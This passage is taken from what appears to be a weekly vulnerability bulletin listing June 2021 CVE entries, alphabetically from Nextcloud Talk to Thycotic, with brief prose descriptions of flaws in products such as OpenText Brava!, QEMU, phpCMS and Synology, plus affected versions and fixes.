Nextcloud Talk is a fully on-premises audio/video and chat communication service. Password protected shared chats in Talk before version 9.0.10, 10.0.8 and 11.2.2 did not rotate the session cookie after a successful authentication event. It is recommended that the Nextcloud Talk App is upgraded to 9.0.10, 10.0.8 or 11.2.2. No workarounds for this vulnerability are known to exist. 2021-06-16 not yet calculated CVE-2021-32676
CONFIRM
MISC
octopus — server
 
Affected versions of Octopus Server are prone to an authenticated SQL injection vulnerability in the Events REST API because user supplied data in the API request isn’t parameterised correctly. Exploiting this vulnerability could allow unauthorised access to database tables. 2021-06-17 not yet calculated CVE-2021-31818
MISC
open_design_alliance — drawings_sdk An out-of-bounds write issue exists in the DWG file-reading procedure in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a write past the end of an allocated buffer and allow attackers to cause a denial-of-service condition or execute code in the context of the current process. 2021-06-17 not yet calculated CVE-2021-32948
MISC
open_design_alliance — drawings_sdk An out-of-bounds read issue exists in the DWG file-recovering procedure in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a read past the end of an allocated buffer and allow attackers to cause a denial-of-service condition or read sensitive information from memory locations. 2021-06-17 not yet calculated CVE-2021-32940
MISC
open_design_alliance — drawings_sdk An out-of-bounds read issue exists within the parsing of DXF files in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a read past the end of an allocated buffer and allows attackers to cause a denial-of-service condition or read sensitive information from memory locations. 2021-06-17 not yet calculated CVE-2021-32950
MISC
open_design_alliance — drawings_sdk
 
A use-after-free issue exists in the DGN file-reading procedure in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a memory corruption or arbitrary code execution, allowing attackers to cause a denial-of-service condition or execute code in the context of the current process. 2021-06-17 not yet calculated CVE-2021-32944
MISC
open_design_alliance — drawings_sdk
 
Drawings SDK (All versions prior to 2022.4) are vulnerable to an out-of-bounds read due to parsing of DWG files resulting from the lack of proper validation of user-supplied data. This can result in a read past the end of an allocated buffer and allows attackers to cause a denial-of service condition or read sensitive information from memory. 2021-06-17 not yet calculated CVE-2021-32938
MISC
open_design_alliance — drawings_sdk
 
An improper check for unusual or exceptional conditions issue exists within the parsing DGN files from Drawings SDK (Version 2022.4 and prior) resulting from the lack of proper validation of the user-supplied data. This may result in several of out-of-bounds problems and allow attackers to cause a denial-of-service condition or execute code in the context of the current process. 2021-06-17 not yet calculated CVE-2021-32946
MISC
open_design_alliance — drawings_sdk
 
An out-of-bounds write issue exists in the DGN file-reading procedure in the Drawings SDK (Version 2022.4 and prior) resulting from the lack of proper validation of user-supplied data. This can result in a write past the end of an allocated buffer and allow attackers to cause a denial-of-service condition or execute code in the context of the current process. 2021-06-17 not yet calculated CVE-2021-32952
MISC
open_design_alliance — drawings_sdk
 
An out-of-bounds write issue exists in the DXF file-recovering procedure in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a write past the end of an allocated buffer and allow attackers to cause a denial-of-service condition or execute code in the context of the current process. 2021-06-17 not yet calculated CVE-2021-32936
MISC
opencast — opencast
 
Opencast is a free and open source solution for automated video capture and distribution. Versions of Opencast prior to 9.6 are vulnerable to the billion laughs attack, which allows an attacker to easily execute a (seemingly permanent) denial of service attack, essentially taking down Opencast using a single HTTP request. To exploit this, users need to have ingest privileges, limiting the group of potential attackers The problem has been fixed in Opencast 9.6. There is no known workaround for this issue. 2021-06-16 not yet calculated CVE-2021-32623
MISC
CONFIRM
opentext — brava! This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12719. 2021-06-15 not yet calculated CVE-2021-31491
N/A
opentext — brava! This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.4.55. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13673. 2021-06-15 not yet calculated CVE-2021-31502
N/A
opentext — brava! This vulnerability allows remote attackers to disclose sensitive information on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWG files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-13310. 2021-06-15 not yet calculated CVE-2021-31501
N/A
opentext — brava! This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of DWG files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13311. 2021-06-15 not yet calculated CVE-2021-31497
N/A
opentext — brava! This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13308. 2021-06-15 not yet calculated CVE-2021-31496
N/A
opentext — brava! This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13307. 2021-06-15 not yet calculated CVE-2021-31495
N/A
opentext — brava! This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13304. 2021-06-15 not yet calculated CVE-2021-31493
N/A
opentext — brava! This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12720. 2021-06-15 not yet calculated CVE-2021-31492
N/A
opentext — brava! This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13305. 2021-06-15 not yet calculated CVE-2021-31494
N/A
opentext — brava! This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SLDPRT files. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12659. 2021-06-15 not yet calculated CVE-2021-31481
N/A
opentext — brava! This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12715. 2021-06-15 not yet calculated CVE-2021-31487
N/A
opentext — brava! This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12711. 2021-06-15 not yet calculated CVE-2021-31485
N/A
opentext — brava! This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12710. 2021-06-15 not yet calculated CVE-2021-31484
N/A
opentext — brava! This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12709. 2021-06-15 not yet calculated CVE-2021-31483
N/A
opentext — brava! This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12708. 2021-06-15 not yet calculated CVE-2021-31482
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12746. 2021-06-15 not yet calculated CVE-2021-31500
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12633. 2021-06-15 not yet calculated CVE-2021-31478
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper initialization of a pointer prior to accessing it. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12634. 2021-06-15 not yet calculated CVE-2021-31479
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12654. 2021-06-15 not yet calculated CVE-2021-31480
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12716. 2021-06-15 not yet calculated CVE-2021-31488
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12745. 2021-06-15 not yet calculated CVE-2021-31499
N/A
opentext — brava!
 
This vulnerability allows remote attackers to disclose sensitive information on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-12744. 2021-06-15 not yet calculated CVE-2021-31498
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12717. 2021-06-15 not yet calculated CVE-2021-31489
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12712. 2021-06-15 not yet calculated CVE-2021-31486
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12718. 2021-06-15 not yet calculated CVE-2021-31490
N/A
otrs — ag_community_edition
 
DoS attack can be performed when an email contains specially designed URL in the body. It can lead to the high CPU usage and cause low quality of service, or in extreme case bring the system to a halt. This issue affects: OTRS AG ((OTRS)) Community Edition 6.0.x version 6.0.1 and later versions. OTRS AG OTRS 7.0.x version 7.0.26 and prior versions; 8.0.x version 8.0.13 and prior versions. 2021-06-14 not yet calculated CVE-2021-21439
MISC
otrs — ag_community_edition
 
There is a XSS vulnerability in the ticket overview screens. It’s possible to collect various information by having an e-mail shown in the overview screen. Attack can be performed by sending specially crafted e-mail to the system and it doesn’t require any user intraction. This issue affects: OTRS AG ((OTRS)) Community Edition 6.0.x version 6.0.1 and later versions. OTRS AG OTRS 7.0.x version 7.0.26 and prior versions. 2021-06-16 not yet calculated CVE-2021-21441
MISC
pagekit — pagekit
 
In PageKit v1.0.18, a user can upload SVG files in the file upload portion of the CMS. These SVG files can contain malicious scripts. This file will be uploaded to the system and it will not be stripped or filtered. The user can create a link on the website pointing to “/storage/exp.svg” that will point to localhost/pagekit/storage/exp.svg. When a user comes along to click that link, it will trigger a XSS attack. 2021-06-16 not yet calculated CVE-2021-32245
MISC
peloton — ttr01
 
Insufficient verification of data authenticity in Peloton TTR01 up to and including PTV55G allows an attacker with physical access to boot into a modified kernel/ramdisk without unlocking the bootloader. 2021-06-15 not yet calculated CVE-2021-33887
MISC
MISC
MISC
phpcms — phpcms phpCMS 2008 sp4 allowas remote malicious users to execute arbitrary php commands via the pagesize parameter to yp/product.php. 2021-06-16 not yet calculated CVE-2020-22201
MISC
phpcms — phpcms
 
SQL Injection in phpCMS 2008 sp4 via the genre parameter to yp/job.php. 2021-06-16 not yet calculated CVE-2020-22203
MISC
phpcms — phpcms
 
SQL Injection vulnerability in phpCMS 2007 SP6 build 0805 via the digg_mod parameter to digg_add.php. 2021-06-16 not yet calculated CVE-2020-22199
MISC
phpmailer — phpmailer
 
PHPMailer before 6.5.0 on Windows allows remote code execution if lang_path is untrusted data and has a UNC pathname. 2021-06-16 not yet calculated CVE-2021-34551
CONFIRM
phpmailer — phpmailer
 
PHPMailer 6.4.1 and earlier contain a vulnerability that can result in untrusted code being called (if such code is injected into the host project’s scope by other means). If the $patternselect parameter to validateAddress() is set to ‘php’ (the default, defined by PHPMailer::$validator), and the global namespace contains a function called php, it will be called in preference to the built-in validator of the same name. Mitigated in PHPMailer 6.5.0 by denying the use of simple strings as validator function names. 2021-06-17 not yet calculated CVE-2021-3603
MISC
CONFIRM
qemu — qemu An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the udp6_input() function and could occur while processing a udp packet that is smaller than the size of the ‘udphdr’ structure. This issue may lead to out-of-bounds read access or indirect host memory disclosure to the guest. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0. 2021-06-15 not yet calculated CVE-2021-3593
MISC
qemu — qemu An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the bootp_input() function and could occur while processing a udp packet that is smaller than the size of the ‘bootp_t’ structure. A malicious guest could use this flaw to leak 10 bytes of uninitialized heap memory from the host. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0. 2021-06-15 not yet calculated CVE-2021-3592
MISC
qemu — qemu
 
An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the udp_input() function and could occur while processing a udp packet that is smaller than the size of the ‘udphdr’ structure. This issue may lead to out-of-bounds read access or indirect host memory disclosure to the guest. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0. 2021-06-15 not yet calculated CVE-2021-3594
MISC
qemu — qemu
 
An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the tftp_input() function and could occur while processing a udp packet that is smaller than the size of the ‘tftp_t’ structure. This issue may lead to out-of-bounds read access or indirect host memory disclosure to the guest. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0. 2021-06-15 not yet calculated CVE-2021-3595
MISC
qnap — nas
 
Insecure storage of sensitive information has been reported to affect QNAP NAS running myQNAPcloud Link. If exploited, this vulnerability allows remote attackers to read sensitive information by accessing the unrestricted storage mechanism. This issue affects: QNAP Systems Inc. myQNAPcloud Link versions prior to 2.2.21 on QTS 4.5.3; versions prior to 2.2.21 on QuTS hero h4.5.2; versions prior to 2.2.21 on QuTScloud c4.5.4. 2021-06-16 not yet calculated CVE-2021-28815
CONFIRM
quassel — quassel
 
Quassel through 0.13.1, when –require-ssl is enabled, launches without SSL or TLS support if a usable X.509 certificate is not found on the local system. 2021-06-17 not yet calculated CVE-2021-34825
MISC
rapid7 — nexpose
 
Rapid7 Nexpose is vulnerable to a non-persistent cross-site scripting vulnerability affecting the Security Console’s Filtered Asset Search feature. A specific search criterion and operator combination in Filtered Asset Search could have allowed a user to pass code through the provided search field. This issue affects version 6.6.80 and prior, and is fixed in 6.6.81. If your Security Console currently falls on or within this affected version range, ensure that you update your Security Console to the latest version. 2021-06-16 not yet calculated CVE-2021-3535
CONFIRM
receita — federal_irpf
 
Receita Federal IRPF 2021 1.7 allows a man-in-the-middle attack against the update feature. 2021-06-12 not yet calculated CVE-2021-34682
MISC
restund — restund
 
Restund is an open source NAT traversal server. The restund TURN server can be instructed to open a relay to the loopback address range. This allows you to reach any other service running on localhost which you might consider private. In the configuration that we ship (github.com/wireapp/ansible-restund/blob/master/templates/restund.conf.j2#L40-L43) the `status` interface of restund is enabled and is listening on `127.0.0.1`.The `status` interface allows users to issue administrative commands to `restund` like listing open relays or draining connections. It would be possible for an attacker to contact the status interface and issue administrative commands by setting `XOR-PEER-ADDRESS` to `127.0.0.1:{{restund_udp_status_port}}` when opening a TURN channel. We now explicitly disallow relaying to loopback addresses, ‘any’ addresses, link local addresses, and the broadcast address. As a workaround disable the `status` module in your restund configuration. However there might still be other services running on `127.0.0.0/8` that you do not want to have exposed. The `turn` module can be disabled. Restund will still perform STUN and this might already be enough for initiating calls in your environments. TURN is only used as a last resort when other NAT traversal options do not work. One should also make sure that the TURN server is set up with firewall rules so that it cannot relay to other addresses that you don’t want the TURN server to relay to. For example other services in the same VPC where the TURN server is running. Ideally TURN servers should be deployed in an isolated fashion where they can only reach what they need to reach to perform their task of assisting NAT-traversal. 2021-06-11 not yet calculated CVE-2021-21382
MISC
CONFIRM
MISC
MISC
MISC
MISC
MISC
riot — riot-os RIOT-OS 2021.01 before commit bc59d60be60dfc0a05def57d74985371e4f22d79 contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 not yet calculated CVE-2021-31663
MISC
MISC
CONFIRM
riot — riot-os
 
RIOT-OS 2021.01 before commit 07f1254d8537497552e7dce80364aaead9266bbe contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 not yet calculated CVE-2021-31662
CONFIRM
MISC
riot — riot-os
 
RIOT-OS 2021.01 before commit 609c9ada34da5546cffb632a98b7ba157c112658 contains a buffer overflow that could allow attackers to obtain sensitive information. 2021-06-18 not yet calculated CVE-2021-31661
MISC
CONFIRM
riot — riot-os
 
RIOT-OS 2021.01 before commit 85da504d2dc30188b89f44c3276fc5a25b31251f contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 not yet calculated CVE-2021-31660
MISC
CONFIRM
riot — riot-os
 
RIOT-OS 2021.01 before commit 44741ff99f7a71df45420635b238b9c22093647a contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 not yet calculated CVE-2021-31664
MISC
CONFIRM
roanwiz — dext5editor
 
Parameter manipulation can bypass authentication to cause file upload and execution. This will execute the remote code. This issue affects: Raonwiz DEXT5Editor versions prior to 3.5.1405747.1100.03. 2021-06-15 not yet calculated CVE-2020-7864
MISC
safenet — keysource_management_console
 
SafeNet KeySecure Management Console 8.12.0 is vulnerable to HTTP response splitting attacks. A remote attacker could exploit this vulnerability using specially-crafted URL to cause the server to return a split response, once the URL is clicked. 2021-06-16 not yet calculated CVE-2021-28979
MISC
MISC
MISC
sap — netweaver_abap_server
 
SAP NetWeaver ABAP Server and ABAP Platform, versions – 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 804, does not create information about internal and external RFC user in consistent and distinguished format, which could lead to improper authentication and may be exploited by malicious users to obtain illegitimate access to the system. 2021-06-16 not yet calculated CVE-2021-27610
MISC
MISC
secure_8 — secure_8
 
Secure 8 (Evalos) does not validate user input data correctly, allowing a remote attacker to perform a Blind SQL Injection. An attacker could exploit this vulnerability in order to extract information of users and administrator accounts stored in the database. 2021-06-18 not yet calculated CVE-2021-3604
CONFIRM
CONFIRM
sentinel — ldk_run-time_environment
 
The Sentinel LDK Run-Time Environment installer (Versions 7.6 and prior) adds a firewall rule named “Sentinel License Manager” that allows incoming connections from private networks using TCP Port 1947. While uninstalling, the uninstaller fails to close Port 1947. 2021-06-16 not yet calculated CVE-2021-32928
MISC
serenityos — serenityos
 
SerenityOS before commit 3844e8569689dd476064a0759d704bc64fb3ca2c contains a directory traversal vulnerability in tar/unzip that may lead to command execution or privilege escalation. 2021-06-18 not yet calculated CVE-2021-31272
MISC
MISC
MISC
CONFIRM
serenityos — test-crypto.cpp
 
SerenityOS in test-crypto.cpp contains a stack buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 not yet calculated CVE-2021-33186
CONFIRM
serenityos — testbitmap
 
SerenityOS contains a buffer overflow in the set_range test in TestBitmap which could allow attackers to obtain sensitive information. 2021-06-18 not yet calculated CVE-2021-33185
CONFIRM
sinamics — sm@rtserver
 
SINAMICS medium voltage routable products are affected by a vulnerability in the Sm@rtServer component for remote access that could allow an unauthenticated attacker to cause a denial-of-service condition, and/or execution of limited configuration modifications and/or execution of limited control commands on the SINAMICS Medium Voltage Products, Remote Access (SINAMICS SL150: All versions, SINAMICS SM150: All versions, SINAMICS SM150i: All versions). 2021-06-15 not yet calculated CVE-2021-27388
MISC
sing4g — 4gee_router_hh70vb_version_hh70_e1_02.00_22
 
An issue was discovered on 4GEE ROUTER HH70VB Version HH70_E1_02.00_22. Attackers can use slowhttptest tool to send incomplete HTTP request, which could make server keep waiting for the packet to finish the connection, until its resource exhausted. Then the web server is denial-of-service. 2021-06-18 not yet calculated CVE-2021-33822
MISC
MISC
MISC
slim — nfc_70_10.01_devices
 
Protectimus SLIM NFC 70 10.01 devices allow a Time Traveler attack in which attackers can predict TOTP passwords in certain situations. The time value used by the device can be set independently from the used seed value for generating time-based one-time passwords, without authentication. Thus, an attacker with short-time physical access to a device can set the internal real-time clock (RTC) to the future, generate one-time passwords, and reset the clock to the current time. This allows the generation of valid future time-based one-time passwords without having further access to the hardware token. 2021-06-16 not yet calculated CVE-2021-32033
MISC
FULLDISC
sonatype — nexus_repository_manager
 
Sonatype Nexus Repository Manager 3.x before 3.31.0 allows a remote authenticated attacker to get a list of blob files and read the content of a blob file (via a GET request) without having been granted access. 2021-06-18 not yet calculated CVE-2021-34553
CONFIRM
sonicos — sonicos
 
A buffer overflow vulnerability in SonicOS allows a remote attacker to cause a Denial of Service (DoS) by sending a specially crafted request. This vulnerability affects SonicOS Gen5, Gen6, Gen7 platforms, and SonicOSv virtual firewalls. 2021-06-14 not yet calculated CVE-2021-20027
CONFIRM
sourcecodester — alumni_management_system
 
SQL injection vulnerability in SourceCodester Alumni Management System 1.0 allows the user to inject SQL payload to bypass the authentication via admin/login.php. 2021-06-15 not yet calculated CVE-2020-29214
EXPLOIT-DB
sourcecodester — alumni_management_system
 
A Cross Site Scripting in SourceCodester Employee Management System 1.0 allows the user to execute alert messages via /Employee Management System/addemp.php on admin account. 2021-06-15 not yet calculated CVE-2020-29215
EXPLOIT-DB
stampit — supermixer
 
Prototype pollution in Stampit supermixer 1.0.3 allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation. 2021-06-16 not yet calculated CVE-2020-24939
CONFIRM
CONFIRM
MISC
striptags — striptags
 
The npm package “striptags” is an implementation of PHP’s strip_tags in Typescript. In striptags before version 3.2.0, a type-confusion vulnerability can cause `striptags` to concatenate unsanitized strings when an array-like object is passed in as the `html` parameter. This can be abused by an attacker who can control the shape of their input, e.g. if query parameters are passed directly into the function. This can lead to a XSS. 2021-06-18 not yet calculated CVE-2021-32696
MISC
MISC
CONFIRM
MISC
studio-42 — elfinder
 
The package studio-42/elfinder before 2.1.58 are vulnerable to Remote Code Execution (RCE) via execution of PHP code in a .phar file. NOTE: This only applies if the server parses .phar files as PHP. 2021-06-13 not yet calculated CVE-2021-23394
CONFIRM
CONFIRM
CONFIRM
CONFIRM
sylabs — singularity
 
Sylabs Singularity 3.5.x and 3.6.x, and SingularityPRO before 3.5-8, has an Incorrect Check of a Function’s Return Value. 2021-06-15 not yet calculated CVE-2021-33622
MISC
MISC
symfony — symfony
 
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. A vulnerability related to firewall authentication is in Symfony starting with version 5.3.0 and prior to 5.3.2. When an application defines multiple firewalls, the token authenticated by one of the firewalls was available for all other firewalls. This could be abused when the application defines different providers for each part of the application, in such a situation, a user authenticated on a part of the application could be considered authenticated on the rest of the application. Starting in version 5.3.2, a patch ensures that the authenticated token is only available for the firewall that generates it. 2021-06-17 not yet calculated CVE-2021-32693
MISC
CONFIRM
MISC
MISC
synology — calendar
 
Use of hard-coded credentials vulnerability in php component in Synology Calendar before 2.4.0-0761 allows remote attackers to obtain sensitive information via unspecified vectors. 2021-06-18 not yet calculated CVE-2021-34812
CONFIRM
synology — download_station Server-Side Request Forgery (SSRF) vulnerability in task management component in Synology Download Station before 3.8.16-3566 allows remote authenticated users to access intranet resources via unspecified vectors. 2021-06-18 not yet calculated CVE-2021-34811
CONFIRM
synology — download_station
 
Improper neutralization of special elements used in a command (‘Command Injection’) vulnerability in task management component in Synology Download Station before 3.8.16-3566 allows remote authenticated users to execute arbitrary code via unspecified vectors. 2021-06-18 not yet calculated CVE-2021-34809
CONFIRM
synology — download_station
 
Improper privilege management vulnerability in cgi component in Synology Download Station before 3.8.16-3566 allows remote authenticated users to execute arbitrary code via unspecified vectors. 2021-06-18 not yet calculated CVE-2021-34810
CONFIRM
synology — media_server
 
Server-Side Request Forgery (SSRF) vulnerability in cgi component in Synology Media Server before 1.8.3-2881 allows remote attackers to access intranet resources via unspecified vectors. 2021-06-18 not yet calculated CVE-2021-34808
CONFIRM
teamviewer — teamviewer
 
TeamViewer before 14.7.48644 on Windows loads untrusted DLLs in certain situations. 2021-06-16 not yet calculated CVE-2021-34803
MISC
tenvoy — tenvoy
 
tEnvoy contains the PGP, NaCl, and PBKDF2 in node.js and the browser (hashing, random, encryption, decryption, signatures, conversions), used by TogaTech.org. In versions prior to 7.0.3, the `verifyWithMessage` method of `tEnvoyNaClSigningKey` always returns `true` for any signature that has a SHA-512 hash matching the SHA-512 hash of the message even if the signature was invalid. This issue is patched in version 7.0.3. As a workaround: In `tenvoy.js` under the `verifyWithMessage` method definition within the `tEnvoyNaClSigningKey` class, ensure that the return statement call to `this.verify` ends in `.verified`. 2021-06-16 not yet calculated CVE-2021-32685
MISC
MISC
CONFIRM
thycotic — password_reset_server
 
Thycotic Password Reset Server before 5.3.0 allows credential disclosure. 2021-06-11 not yet calculated CVE-2021-34679
MISC
